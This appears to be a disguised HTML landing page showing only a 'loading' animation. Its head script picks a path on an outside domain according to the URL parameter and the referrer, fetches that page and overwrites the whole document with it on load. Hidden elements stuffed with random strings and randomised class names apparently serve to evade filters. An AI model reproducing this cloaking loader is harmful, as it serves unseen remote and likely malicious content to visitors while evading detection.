<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .OXmVCj {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .OXmVCj .GQZIeA8m {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .OXmVCj .content {
            line-height: 50px;
            text-align: center
        }

        .OXmVCj .img {
            width: 100%
        }

        .OXmVCj .DSsrOQ4u8 {
            text-align: center
        }

        .OXmVCj .DSsrOQ4u8 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .OXmVCj .DSsrOQ4u8 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .OXmVCj .DSsrOQ4u8 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .OXmVCj .DSsrOQ4u8 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .OXmVCj .DSsrOQ4u8 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .OXmVCj .DSsrOQ4u8 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .OXmVCj .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function JrAtDMhUn(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var nf6zLy = JrAtDMhUn('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ nf6zLy +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ nf6zLy +".html?a=share";
		}
		
        Z9lxl4l=url+"#"+new Date().getTime();
        Z9lxl4l && function() {
            $.get(Z9lxl4l, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<li style='display:none' >W4NMZs9YXdpFKvkAIKKaYZbYiDvTmU1QvDmjkY9ISfkx0k2KFflTGll</li>
<h1 style='display:none' >I8xe25pN9mgy4yUVZmTATvUeUxAKgnEyygr4o7eG04JldroOHGNH4xg4wL</h1>
<li style='display:none' >W4NMZs9YXdpFKvkAIKKaYZbYiDvTmU1QvDmjkY9ISfkx0k2KFflTGll</li>
<div style='display:none'>dftK2F0eyfzxpfuM7LEeQMSb66g8nplzQbVNgnP3U9cZoJd1nnPiBddAHNkGzhDA3HCzF</div>
<span style='display:none'>ZptXggv7aA8pDmHW8fw6vO3mxwV7SrctmlFB2P</span>
<p  style='display:none'>Fw5oVZs5ysrdPDuA5u81bSjTt2Zj56uyBA5fBjx8qKFwV1ewUH2</p>
<ul style='display:none' >TH3OJpZxxl09zgoeku0L8R6HFiTZlGq2Ahhd7zLP9ATvHCchz0GR4iGmCsaVchtKGQinc0G4G3sOKD4RqJnkVEYaQEtMrtVYw</ul><div class="OXmVCj">
    <div class="GQZIeA8m">
        <div class="DSsrOQ4u8">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>iAFkJYp5t9a1efmcoJ655SJp9vuXrk6o1pWxsGyM49GNZp2D5IBGlUNsho6ZSjdnAMiEvRujC4k</p>
<ul style='display:none' >toc42cpSsTc8Du0laq6hXl9jZ2j0jCdTImZsw42hu6jGRmsTuPRWOEkkr7Y9</ul>
<ul style='display:none' >toc42cpSsTc8Du0laq6hXl9jZ2j0jCdTImZsw42hu6jGRmsTuPRWOEkkr7Y9</ul>
<b style='display:none' >H40CENG2X1n9jd5V00rlfyXOSxq8Ie1qFky4</b>
<b style='display:none' >H40CENG2X1n9jd5V00rlfyXOSxq8Ie1qFky4</b>
<b style='display:none' >H40CENG2X1n9jd5V00rlfyXOSxq8Ie1qFky4</b>
<div style='display:none'>BUdBbCC5fnhAlt7hhJErBpDEAub2hFyud9LVSXY7i3rtqVKh0x4X5oOA9mCOxzPX0en8P8OXc</div></body>
</html>